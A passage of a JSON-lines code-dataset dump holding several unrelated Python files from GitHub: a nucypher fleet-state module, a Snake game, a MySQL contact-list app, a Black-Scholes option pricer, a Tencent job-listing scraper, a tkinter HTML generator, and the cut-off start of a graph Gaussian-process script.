it\n self._nodes_to_remove.add(node.checksum_address)\n\n def record_remote_fleet_state(self,\n checksum_address: ChecksumAddress,\n state_checksum: FleetStateChecksum,\n timestamp: maya.MayaDT,\n population: int):\n\n if checksum_address not in self._current_state:\n raise KeyError(f\"A node {checksum_address} is not present in the current fleet state\")\n\n nickname = Nickname.from_seed(bytes(state_checksum), length=1)\n state = ArchivedFleetState(checksum=state_checksum,\n nickname=nickname,\n timestamp=timestamp,\n population=population)\n\n self._remote_last_seen[checksum_address] = maya.now()\n self._remote_states[checksum_address] = state\n\n def status_info(\n self,\n checksum_address_or_node: Union[ChecksumAddress, \"characters.lawful.Ursula\"],\n ) -> \"RemoteUrsulaStatus\":\n if isinstance(checksum_address_or_node, str):\n node = self[checksum_address_or_node]\n else:\n node = checksum_address_or_node\n\n recorded_fleet_state = self._remote_states.get(node.checksum_address, None)\n last_learned_from = self._remote_last_seen.get(node.checksum_address, None)\n operator_address = node.operator_address if node.verified_node else None\n\n return RemoteUrsulaStatus(verified=node.verified_node,\n nickname=node.nickname,\n staker_address=node.checksum_address,\n operator_address=operator_address,\n rest_url=node.rest_url(),\n timestamp=node.timestamp,\n last_learned_from=last_learned_from,\n recorded_fleet_state=recorded_fleet_state,\n )\n\n\nclass RemoteUrsulaStatus(NamedTuple):\n verified: bool\n nickname: Nickname\n staker_address: ChecksumAddress\n operator_address: Optional[ChecksumAddress]\n rest_url: str\n timestamp: maya.MayaDT\n recorded_fleet_state: Optional[ArchivedFleetState]\n last_learned_from: Optional[maya.MayaDT]\n\n def to_json(self) -> Dict[str, Any]:\n if self.recorded_fleet_state is None:\n recorded_fleet_state_json = None\n else:\n recorded_fleet_state_json = self.recorded_fleet_state.to_json()\n if self.last_learned_from is None:\n last_learned_from_json = None\n else:\n last_learned_from_json = self.last_learned_from.iso8601()\n return dict(verified=self.verified,\n nickname=self.nickname.to_json(),\n staker_address=self.staker_address,\n operator_address=self.operator_address,\n rest_url=self.rest_url,\n timestamp=self.timestamp.iso8601(),\n recorded_fleet_state=recorded_fleet_state_json,\n last_learned_from=last_learned_from_json)\n","repo_name":"nucypher/nucypher","sub_path":"nucypher/acumen/perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":15226,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"27"} +{"seq_id":"15898807062","text":"import turtle as t\n\nSTART_POS = [(0, 0), (-20, 0), (-40, 0)]\nM = 13\nRIGHT = 0\nUP = 90\nLEFT = 180\nDOWN = 270\n\n\nclass Snake:\n\n def __init__(self):\n self.segments = []\n self.create_snake()\n self.head = self.segments[0]\n self.head.shape(\"circle\")\n self.head.color(\"red\")\n\n def create_snake(self):\n\n for position in START_POS:\n self.add_segment(position)\n\n def add_segment(self, position):\n new_snake = t.Turtle()\n new_snake.shape(\"circle\")\n new_snake.color(\"white\")\n new_snake.shapesize(1.2)\n new_snake.penup()\n new_snake.goto(position)\n self.segments.append(new_snake)\n\n def reset_snake(self):\n for i in self.segments:\n i.goto(1000, 1000)\n self.segments.clear()\n self.create_snake()\n self.head = self.segments[0]\n self.head.shape(\"circle\")\n self.head.color(\"red\")\n\n def extend(self):\n self.add_segment(self.segments[-1].position())\n\n def move(self):\n for seg in range(len(self.segments) - 1, 0, -1):\n new_x = self.segments[seg - 1].xcor()\n new_y = self.segments[seg - 1].ycor()\n self.segments[seg].goto(new_x, new_y)\n self.segments[0].forward(M)\n\n def up(self):\n if self.head.heading() != DOWN:\n self.head.setheading(UP)\n\n def down(self):\n if self.head.heading() != UP:\n self.head.setheading(DOWN)\n\n def right(self):\n if self.head.heading() != LEFT:\n self.head.setheading(RIGHT)\n\n def left(self):\n if self.head.heading() != RIGHT:\n self.head.setheading(LEFT)\n","repo_name":"polonium31/Python_Projects","sub_path":"APP/Game/snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41927432752","text":"import mysql.connector\nimport re\nimport tkinter as tk\nfrom tkinter import messagebox\n\ncompleted = False\n\n\ndef connection(database=None):\n return mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"R+D@11\",\n database=database,\n auth_plugin=\"mysql_native_password\",\n )\n\n\ndef create_db():\n db = connection()\n try:\n cur = db.cursor()\n sql = \"CREATE DATABASE contact_list;\"\n\n cur.execute(sql)\n\n print(\"The DB has been successfully created! :)\")\n except:\n print()\n\n\ndef create_table():\n db = connection(\"contact_list\")\n try:\n cur = db.cursor()\n sql = \"\"\"\n CREATE TABLE contact (id INT(10) NOT NULL PRIMARY KEY AUTO_INCREMENT, \n first_name VARCHAR(50) COLLATE utf8_spanish2_ci NOT NULL, last_name \n VARCHAR(50) COLLATE utf8_spanish2_ci, country_code VARCHAR(10), \n phone VARCHAR(20), phone_category VARCHAR(10), email VARCHAR(50), \n street VARCHAR(50) COLLATE utf8_spanish2_ci, house_number VARCHAR(10), city \n VARCHAR(50) COLLATE utf8_spanish2_ci, province VARCHAR(50) COLLATE \n utf8_spanish2_ci, country VARCHAR(50) COLLATE utf8_spanish2_ci);\n \"\"\"\n\n cur.execute(sql)\n\n print(\"The table has been successfully created! :)\")\n except:\n print()\n\n\ndef add_contact(parent, data):\n global completed\n\n db = connection(\"contact_list\")\n cur = db.cursor()\n sql = \"\"\"\n INSERT INTO contact (first_name, last_name, country_code, phone, \n phone_category, email, street, house_number, city, province, country) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\n \"\"\"\n invalid = get_invalid_data(data)\n\n if data[0]:\n if not contact_exists(data[0], data[1]):\n if invalid:\n messagebox.showerror(\n \"Invalid Values\",\n \"The following fields have invalid values: \"\n + \", \".join(invalid)\n + \".\",\n )\n\n completed = False\n else:\n cur.execute(sql, data)\n db.commit()\n\n parent.show_contacts()\n\n if data[0] in (\"Ramón\", \"Ramon\", \"ramón\", \"ramon\") and data[1] in (\n \"Vásquez\",\n \"Vasquez\",\n \"vásquez\",\n \"vasquez\",\n ):\n messagebox.showinfo(\n \"Thanks!\",\n \"Thank you for adding me! You can contact me for tech support! :D\",\n )\n else:\n messagebox.showinfo(\n \"Contact Created\",\n \"%s%s%s has been successfully added!\"\n % (data[0], \" \" if data[1] else \"\", data[1]),\n )\n\n completed = True\n else:\n messagebox.showwarning(\n \"Existing Contact\",\n \"%s%s%s is already a contact!\"\n % (data[0], \" \" if data[1] else \"\", data[1]),\n )\n\n completed = False\n else:\n messagebox.showerror(\"Name Required\", \"You can't create a nameless contact!\")\n\n completed = False\n\n db.close()\n\n\ndef update_contact(parent, data, id):\n global completed\n data.append(id)\n\n db = connection(\"contact_list\")\n cur = db.cursor()\n sql = \"\"\"\n UPDATE contact SET first_name = %s, last_name = %s, country_code = %s, \n phone = %s, phone_category = %s, email = %s, street = %s, house_number = %s, \n city = %s, province = %s, country = %s WHERE id = %s;\n \"\"\"\n invalid = get_invalid_data(data)\n\n if data[0]:\n if invalid:\n messagebox.showerror(\n \"Invalid Values\",\n \"The following fields have invalid values: \" + \", \".join(invalid) + \".\",\n )\n\n completed = False\n else:\n cur.execute(sql, data)\n db.commit()\n\n parent.show_contacts()\n\n messagebox.showinfo(\n \"Contact Updated\",\n \"%s%s%s's data has been updated!\"\n % (data[0], \" \" if data[1] else \"\", data[1]),\n )\n\n completed = True\n\n parent.btn_update.destroy()\n\n parent.btn_add = tk.Button(\n parent.frm_buttons,\n text=\"Add\",\n width=30,\n height=1,\n command=lambda: [\n add_contact(parent, parent.get_contact_data()),\n parent.reset_form() if completed else \"\",\n ],\n )\n parent.btn_add.grid(row=0, column=0, padx=5, pady=5, sticky=tk.S)\n\n parent.frm_form[\"text\"] = \"Add Contact\"\n else:\n messagebox.showerror(\"Name Required\", \"You can't update a nameless contact!\")\n\n db.close()\n\n\ndef delete_contact(parent, treeview):\n # Sets the instructin to delete the selected contact\n db = connection(\"contact_list\")\n cur = db.cursor()\n sql_1 = \"DELETE FROM contact WHERE id = %s;\"\n id = treeview.focus()\n dato = (id,)\n\n # Gets first and last names to fill the messagebox\n sql_2 = \"SELECT first_name, last_name FROM contact WHERE id = %s; \"\n cur.execute(sql_2, dato)\n res = cur.fetchall()\n first = res[0][0]\n last = res[0][1]\n\n answer = messagebox.askyesno(\n \"Delete Contact\",\n \"Are you sure you want to delete %s%s%s?\" % (first, \" \" if last else \"\", last),\n )\n\n if answer:\n if first in (\"Ramón\", \"Ramon\", \"ramón\", \"ramon\") and last in (\n \"Vásquez\",\n \"Vasquez\",\n \"vásquez\",\n \"vasquez\",\n ):\n messagebox.showinfo(\":(\", \"Oh, that's such a pity! Bye! :(\")\n cur.execute(sql_1, dato)\n db.commit()\n parent.show_contacts()\n\n db.close()\n\n\ndef search_contact(**kwargs):\n db = connection(\"contact_list\")\n data = ()\n sql = \"\"\n\n cur = db.cursor()\n\n for key in kwargs:\n if key == \"first_name\" or key == \"last_name\":\n if isinstance(kwargs[\"first_name\"], tuple) or isinstance(\n kwargs[\"last_name\"], tuple\n ):\n if kwargs[\"first_name\"] != (\"\",) and kwargs[\"last_name\"] == (\"\",):\n sql = \"SELECT * FROM contact WHERE first_name = %s;\"\n data = (kwargs[\"first_name\"][0],)\n elif kwargs[\"first_name\"] == (\"\",) and kwargs[\"last_name\"] != (\"\",):\n sql = \"SELECT * FROM contact WHERE last_name = %s;\"\n data = (kwargs[\"last_name\"][0],)\n elif kwargs[\"first_name\"] != (\"\",) and kwargs[\"last_name\"] != (\"\",):\n sql = \"SELECT * FROM contact WHERE first_name = %s AND last_name = %s;\"\n data = (kwargs[\"first_name\"][0], kwargs[\"last_name\"][0])\n else:\n sql = \"SELECT * FROM contact WHERE first_name = %s AND last_name = %s;\"\n data = (kwargs[\"first_name\"], kwargs[\"last_name\"])\n elif key == \"id\":\n sql = \"SELECT * FROM contact WHERE id = %s\"\n data = (kwargs[\"id\"],)\n\n cur.execute(sql, data)\n res = cur.fetchall()\n\n db.close()\n\n return res\n\n\ndef get_invalid_data(data):\n invalid = []\n\n if is_invalid_text(data[0]):\n invalid.append(\"first name\")\n if is_invalid_text(data[1]):\n invalid.append(\"last name\")\n if data[5] and not is_valid_email(data[5]):\n invalid.append(\"email\")\n if is_invalid_number(data[3]):\n invalid.append(\"phone\")\n if is_invalid_alphanumeric(data[8]):\n invalid.append(\"city\")\n if is_invalid_alphanumeric(data[6]):\n invalid.append(\"street\")\n if is_invalid_number(data[7]):\n invalid.append(\"house number\")\n\n return invalid\n\n\ndef contact_exists(first_name, last_name):\n return search_contact(first_name=first_name, last_name=last_name)\n\n\ndef is_invalid_text(data):\n return re.search(r\"[^A-Za-zÁáÉéÍíÓóÚú \\'\\.-]+\", data)\n\n\ndef is_valid_email(data):\n return re.search(r\"([A-Za-z0-9_\\.]+@[A-Za-z0-9_]+(?:\\.[a-z]+)+)\", data)\n\n\ndef is_invalid_number(data):\n return re.search(r\"[^0-9]+\", data)\n\n\ndef is_invalid_alphanumeric(data):\n return re.search(r\"[^A-Za-z0-9ÁáÉéÍíÓóÚú \\'\\.-]+\", data)\n","repo_name":"ramonfvasquez/contact_list_python","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":8411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19550708107","text":"import numpy as np\r\nimport math\r\nimport scipy.stats as st\r\n\r\ndef blackScholes(s, x, t, r, v, divType = '', dividends = {}, prnt = True):\r\n \"\"\"\r\n Function that values options using the Black-Scholes model\r\n ----------\r\n s : The current spot price of the underlying asset\r\n x : The strike price of the option contract\r\n t : The time to maturity of the option contract\r\n r : The risk-free rate over the life of the option\r\n v : The volatility of the underlying assets price\r\n \r\n Optional:\r\n divType : '' for no dividends (default), 'D' for discrete, 'C' for continuous\r\n dividends : {amount1: time1, amount2: time2} for discrete dividends, percentage for continuous dividend yield\r\n prnt : True to print option price to console (default), False to disable\r\n \r\n Returns\r\n -------\r\n Call Price, Put Price\r\n \"\"\"\r\n #Discrete Dividends and No Dividends\r\n if divType in ['D', '']:\r\n d = 0\r\n for value in dividends:\r\n d += value * math.exp(-r * dividends[value]) \r\n d1 = (np.log((s - d)/ x) + (r + 0.5 * v ** 2) * t) / (v * math.sqrt(t))\r\n d2 = d1 - v * math.sqrt(t)\r\n nd1, nd2 = st.norm.cdf(d1), st.norm.cdf(d2)\r\n c = max((s - d) * nd1 - x * math.exp(-r * t) * nd2, 0)\r\n p = max(c - (s - d) + x * math.exp(-r * t), 0) #Put-Call Parity\r\n \r\n #Continuous Dividends\r\n elif divType == 'C':\r\n d1 = (np.log(s/ x) + (r - dividends + 0.5 * v ** 2) * t) / (v * math.sqrt(t))\r\n d2 = d1 - v * math.sqrt(t)\r\n nd1, nd2 = st.norm.cdf(d1), st.norm.cdf(d2)\r\n c = max((s) * math.exp(-dividends * t) * nd1 - x * math.exp(-r * t) * nd2, 0)\r\n p = max(c - (s) * math.exp(-dividends * t) + x * math.exp(-r * t), 0) #Put-Call Parity \r\n \r\n if prnt:\r\n print(f\"\"\"The fair price of the call option is ${round(c, 4)}.\r\nThe fair price of the put option is ${round(p, 4)}\"\"\")\r\n return c, p\r\n\r\n#Example Inputs\r\n#No Dividends, $100 share price, $90 strike price, 9 month maturity\r\n#8% risk free rate, 25% share price volatility\r\nprint('*** No Dividends ***')\r\nblackScholes(100, 90, 0.75, 0.08, 0.25)\r\n\r\n#Discrete Dividends, $1 dividend in month 1 and $1.50 dividend in month 7\r\nprint('\\n*** Discrete Dividends ***')\r\nblackScholes(100, 90, 0.75, 0.08, 0.25, 'D', {1: 1/12, 1.50: 7/12})\r\n\r\n#Continuous Dividend Yield, 4% annually\r\nprint('\\n*** Continuous Dividends ***')\r\nblackScholes(100, 90, 0.75, 0.08, 0.25, 'C', 0.04)","repo_name":"sammuharem/blackscholes-option-valuation-calculator","sub_path":"Black Scholes Option Valuation Calculator.py","file_name":"Black Scholes Option Valuation Calculator.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30091004963","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom selenium import webdriver\nfrom lxml import etree\nfrom multiprocessing import Queue, Manager\nfrom concurrent.futures import ThreadPoolExecutor\nfrom gevent.pool import Pool\n# import gevent\n# from gevent.queue import Queue\nimport time\n\nimport pymysql\n\n\ndef get_meg_dict(content, result_list):\n print(len(content))\n tree = etree.HTML(content)\n\n trs = tree.xpath('//table[@class=\"tablelist\"]/tbody/tr')[1:-1]\n\n for tr in trs:\n job = tr.xpath('.//a/text()')[0].strip()\n area = tr.xpath('.//td[4]/text()')[0].strip()\n typ = tr.xpath('.//td[2]/text()')[0].strip()\n # print(area, types)\n meg_dict = {\n 'job': job,\n 'area': area,\n 'typ': str(typ),\n }\n print(meg_dict)\n result_list.append(meg_dict)\n id = tree.xpath('//a[@id=\"next\"]/@href')[0]\n if 'javascript' in id:\n return None\n return 1\n\n\ndef save_to_sql(meg_dict):\n # print('save %s start' % meg_dict['job'], meg_dict['area'], meg_dict['typ'])\n conn = pymysql.connect(\n host='localhost',\n user='root',\n password='xzx199110',\n database='bs',\n port=3306,\n )\n cursor = conn.cursor()\n sql = \"\"\"\n insert into tencent_test (job, area, typ) values (%s, %s, %s)\"\"\"\n try:\n cursor.execute(\n sql, (meg_dict['job'], meg_dict['area'], meg_dict['typ']))\n conn.commit()\n except TypeError as e:\n print(e)\n except Exception as e:\n print(e)\n finally:\n conn.close()\n # print('save %s end' % meg_dict['job'])\n\n\ndef get_all_meg(url, result_list):\n browser = webdriver.Chrome()\n browser.get(url)\n\n content = browser.page_source\n\n get_meg_dict(content, result_list)\n\n try:\n while True:\n browser.find_element_by_id('next').click()\n content = browser.page_source\n meg_dict = get_meg_dict(content, result_list)\n print(meg_dict)\n if meg_dict is None:\n raise Exception\n except Exception:\n browser.close()\n\n\n# def create_result_list(queue_result, result_list):\n# while not queue_result.empty():\n# result_list.append(queue_result.get())\n# return result_list\n\n\nif __name__ == '__main__':\n result_list = Manager().list()\n pool = Pool(size=15)\n url_list = ['https://job.tencent.com/position.php?keywords=&lid=0&tid=8%d' %\n num for num in range(1, 8, 1)]\n\n with ThreadPoolExecutor(max_workers=8) as executor:\n for url in url_list:\n executor.submit(get_all_meg, url, result_list)\n # executor.submit(create_result_list, queue_result, result_list)\n\n # gevent.joinall([gevent.spawn(get_all_meg, url, queue_result) for url in url_list])\n\n print(len(result_list))\n print('start saving')\n pool.map(save_to_sql, result_list)\n # with ThreadPoolExecutor(max_workers=8) as executor:\n # executor.map(save_to_sql, result_list)\n print('saving success')\n","repo_name":"pipoted/bs","sub_path":"spider/tencent_spider/tencent_version1.py","file_name":"tencent_version1.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6779752979","text":"'''\r\nCopyright Lucas Percereau -> lucas.percereau@gmail.com\r\n'''\r\n\r\n'''Imports'''\r\nfrom functools import partial\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk\r\n\r\n'''Variables'''\r\nindex = 2\r\n\r\nelement = []\r\ntype = []\r\n''''''\r\n\r\n'''FONCTIONS'''\r\ndef generateHTML():\r\n str = \"\"\r\n for i in range(len(element)):\r\n if type[i] == \"P\":\r\n str += \"

\"+element[i].get(\"1.0\",'end-1c')+\"

\"+'\\n'\r\n if type[i] == \"S\":\r\n str += \"

Sitographie : test

\"+'\\n'\r\n if type[i] == \"H2\":\r\n str += \"

\" + element[i].get(\"1.0\", 'end-1c') + \"

\"+'\\n'\r\n if type[i] == \"H4\":\r\n str += \"

\" + element[i].get(\"1.0\", 'end-1c') + \"

\"+'\\n'\r\n if type[i] == \"H6\":\r\n str += \"
\" + element[i].get(\"1.0\", 'end-1c') + \"
\"+'\\n'\r\n if type[i] == \"Sign\":\r\n str += \"
-- \"+element[i].get(\"1.0\", 'end-1c')+\"
\"+'\\n'\r\n if type[i] == \"image\":\r\n strFull = element[i].get(\"1.0\", 'end-1c').split(\"%\")\r\n str += \"\\\"\"+strFull[1]+\"\\\"\"+'\\n'\r\n if type[i] == \"legende\":\r\n str += \"
\"+element[i].get(\"1.0\", 'end-1c')+\"
\"+'\\n'\r\n if type[i] == \"hrow\":\r\n str += \"


\"+'\\n'\r\n\r\n f = open(\"articleGenerated.html\", \"w\")\r\n f.write(str)\r\n f.close()\r\n\r\ndef addParagraphe():\r\n global index\r\n text = Text(frame, height=10, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"P\")\r\n label = Label(frame, text='Paragraphe : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addSitographie():\r\n global index\r\n text = Text(frame, height=5, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"S\")\r\n label = Label(frame, text='Sitographie : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addH2():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"H2\")\r\n label = Label(frame, text='Titre H2 : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addH4():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"H4\")\r\n label = Label(frame, text='Titre H4 : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addH6():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"H6\")\r\n label = Label(frame, text='Titre H6 : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addSignature():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"Sign\")\r\n label = Label(frame, text='Signature : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addHrow():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n text.insert(1.0, \"NOTHING TO WRITE HERE, JUST AN HORIZONTAL ROW :D !\")\r\n element.append(text)\r\n type.append(\"Sign\")\r\n label = Label(frame, text='H row : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addImageSimple():\r\n global index\r\n text = Text(frame, height=1, width=150,padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n text.insert(1.0, \"nom_image%description_image\")\r\n element.append(text)\r\n type.append(\"image\")\r\n label = Label(frame, text='Image path : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index,rowspan =3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef addLegende():\r\n global index\r\n text = Text(frame, height=1, width=150, padx=\"5\", pady=\"5\")\r\n text.configure(bg=\"#FDF5E6\")\r\n element.append(text)\r\n type.append(\"legende\")\r\n label = Label(frame, text='Legende : ')\r\n label.configure(bg='#E8927C')\r\n text.grid(column=1, row=index, rowspan=3)\r\n label.grid(column=0, row=index)\r\n\r\n index += 3\r\n replaceButton()\r\n\r\ndef replaceButton():\r\n global index\r\n buttonH2.grid(column=2, row=index)\r\n buttonH4.grid(column=2, row=index + 1)\r\n buttonSitographie.grid(column=2, row=index + 2)\r\n buttonH6.grid(column=3, row=index)\r\n buttonParagraphe.grid(column=3, row=index + 1)\r\n buttonSignature.grid(column=3, row=index + 2)\r\n buttonGenerate.grid(column=1, row=index + 1)\r\n buttonImage.grid(column=2, row=index+3)\r\n buttonLegende.grid(column=3, row=index+3)\r\n buttonHrow.grid(column=2, row=index+4)\r\n updateScrollRegion()\r\n\r\ndef updateScrollRegion():\r\n canvas.update_idletasks()\r\n canvas.config(scrollregion=frame.bbox())\r\n canvas.yview_moveto(1)\r\n\r\ndef mouse_wheel(event):\r\n direction = 0\r\n if event.num == 5 or event.delta == -120:\r\n direction = 1\r\n if event.num == 4 or event.delta == 120:\r\n direction = -1\r\n canvas.yview_scroll(direction, UNITS)\r\n\r\ndef clearTextBox(event):\r\n numeroEdition.delete('1.0', END)\r\n numeroEdition.unbind(\"\")\r\n\r\n'''CREATION FENETRE'''\r\nroot = Tk()\r\nroot.title(\"HTML GENERATOR\")\r\nroot.geometry(\"1600x900\")\r\nroot.bind(\"\", mouse_wheel)\r\nroot.bind('', mouse_wheel)\r\nroot.bind('', mouse_wheel)\r\n''''''\r\n\r\n'''FRAME AND CANVAS FOR SCROLLING'''\r\ncanvas = Canvas(root)\r\nframe = Frame(canvas)\r\ncanvas.configure(bg='#004875')\r\nframe.configure(bg='#004875')\r\nscrollbar = Scrollbar(root)\r\n\r\ncanvas.config(yscrollcommand=scrollbar.set, highlightthickness=0)\r\ncanvas.configure(yscrollincrement='30')\r\nscrollbar.config(orient=VERTICAL, command=canvas.yview)\r\nscrollbar.pack(fill=Y, side=RIGHT, expand=FALSE)\r\ncanvas.pack(fill=BOTH, side=LEFT, expand=TRUE)\r\ncanvas.create_window(0, 0, window=frame, anchor=NW)\r\n''''''\r\n\r\n'''WIDGET'''\r\nlabelTitle = Label(frame, text='HTML GENERATOR',pady=10,padx=30)\r\nlabelTitle.configure(bg='#E8927C')\r\n\r\nnumeroEdition = Text(frame, height=1, width=10,padx=\"5\", pady=\"5\")\r\nnumeroEdition.insert(1.0,\"Edition N°\")\r\nnumeroEdition.bind(\"\", clearTextBox)\r\n\r\n\r\nload = Image.open(\"logoMedium.png\")\r\nrender = ImageTk.PhotoImage(load)\r\nimg = Label(frame, image=render)\r\nimg.configure(bg='#004875')\r\nimg.image = render\r\n\r\nload2 = Image.open(\"logoPolytechMedium.png\")\r\nrender2 = ImageTk.PhotoImage(load2)\r\nimg2 = Label(frame, image=render2)\r\nimg2.configure(bg='#004875')\r\nimg2.image = render2\r\n\r\nbuttonH2 = Button(frame, text='+Titre H2', command=partial(addH2))\r\nbuttonH2.configure(bg='#E8927C')\r\nbuttonH4 = Button(frame, text='+Titre H4', command=partial(addH4))\r\nbuttonH4.configure(bg='#E8927C')\r\nbuttonH6 = Button(frame, text='+Titre H6', command=partial(addH6))\r\nbuttonH6.configure(bg='#E8927C')\r\nbuttonParagraphe = Button(frame, text='+Paragraphe', command=partial(addParagraphe))\r\nbuttonParagraphe.configure(bg='#E8927C')\r\nbuttonSitographie = Button(frame, text='+Sitographie', command=partial(addSitographie))\r\nbuttonSitographie.configure(bg='#E8927C')\r\nbuttonSignature = Button(frame, text='+Signature',command=partial(addSignature))\r\nbuttonSignature.configure(bg='#E8927C')\r\nbuttonImage = Button(frame, text='+Image simple',command=partial(addImageSimple))\r\nbuttonImage.configure(bg='#E8927C')\r\nbuttonLegende = Button(frame, text='+Legende',command=partial(addLegende))\r\nbuttonLegende.configure(bg='#E8927C')\r\nbuttonHrow= Button(frame, text='+H row',command=partial(addHrow))\r\nbuttonHrow.configure(bg='#E8927C')\r\n\r\nbuttonGenerate = Button(frame, text='Generate', command=partial(generateHTML),padx=50)\r\nbuttonGenerate.configure(bg='#E8927C')\r\n''''''\r\n\r\n'''Grid'''\r\nlabelTitle.grid(column=1, row=0)\r\n\r\nnumeroEdition.grid(column=1, row=1)\r\n\r\nimg.grid(column=0, row=0,rowspan =2)\r\nimg2.grid(column=2, row=0,columnspan =2,rowspan =2)\r\n\r\nbuttonH2.grid(column=1, row=2)\r\nbuttonH4.grid(column=1, row=3)\r\nbuttonH6.grid(column=1, row=4)\r\nbuttonParagraphe.grid(column=1, row=5)\r\nbuttonSitographie.grid(column=1, row=6)\r\nbuttonSignature.grid(column=1, row=7)\r\nbuttonImage.grid(column=1, row=8)\r\nbuttonLegende.grid(column=1, row=9)\r\nbuttonHrow.grid(column=1, row=10)\r\n\r\nbuttonGenerate.grid(column=1, row=11)\r\n\r\nroot.mainloop()\r\n''''''\r\n","repo_name":"LucasPercereau/HTML_Generator","sub_path":"HTMLgenerator.py","file_name":"HTMLgenerator.py","file_ext":"py","file_size_in_byte":9337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19955410634","text":"import numpy as np\r\nimport scipy as sp\r\nimport tensorflow as tf\r\nimport torch\r\nfrom torch_geometric import datasets\r\nimport matplotlib.pyplot as plt\r\nimport gpflow\r\nfrom gpflow.utilities import print_summary\r\n\r\nimport argparse\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--data\", default='Cora', type=str, help=\"Cora, Citeseer, Texas, Wisconsin, Cornell, Chameleon, Squirrel, Actor\")\r\nparser.add_argument(\"--base_kernel\", default='Polynomial', type=str, help=\"Polynomial, Matern52, Matern32, Matern12, SquaredPolynomial\")\r\nparser.add_argument(\"--epoch\", default=200, type=int, help=\"number of epochs\")\r\nparser.add_argument(\"--lr\", default=0.1, type=float, help=\"adam learn rate\")\r\nparser.add_argument('--approx', type=bool, default=False, help='default is exact kernel, True for chebyshev approximation')\r\nparser.add_argument('--approx_deg', type=int, default=7, help='degree of chebyshev approximation, only used when --approx=True')\r\nparser.add_argument('--train_on_val', type=bool, default=False, help='if True, validation set is included in the training')\r\nparser.add_argument('--split', type=int, default=0, help='data split if there are multiple')\r\nparser.add_argument('--act', type=str, default='relu', help='relu, tanh')\r\n\r\nparser = parser.parse_args()\r\n\r\ndataset_name = parser.data\r\ndataset_path = f'data/'\r\nif dataset_name in [\"Cora\", \"Citeseer\", \"PubMed\"]:\r\n dataset = datasets.Planetoid(dataset_path, dataset_name)\r\nelif dataset_name in [\"Computers\", \"Photo\"]:\r\n dataset = datasets.Amazon(dataset_path, dataset_name)\r\nelif dataset_name in [\"Physics\", \"CS\"]:\r\n dataset = datasets.Coauthor(dataset_path, dataset_name)\r\nelif dataset_name in [\"Texas\", \"Cornell\", \"Wisconsin\"]:\r\n dataset = datasets.WebKB(dataset_path, dataset_name)\r\nelif dataset_name in [\"Chameleon\", \"Squirrel\"]:\r\n dataset = datasets.WikipediaNetwork(dataset_path, dataset_name)\r\nelif dataset_name in [\"Actor\", 'Film']:\r\n dataset = datasets.Actor(dataset_path, dataset_name)\r\ndata = dataset.data\r\n\r\n# use first mask if there are multiple\r\ntry:\r\n data.train_mask.size(1)\r\n data.train_mask, data.val_mask, data.test_mask = data.train_mask[:,parser.split], data.val_mask[:,parser.split], data.test_mask[:,parser.split]\r\nexcept:\r\n pass\r\n\r\nif parser.train_on_val:\r\n data.train_mask += data.val_mask\r\n \r\nfrom torch_geometric.utils import 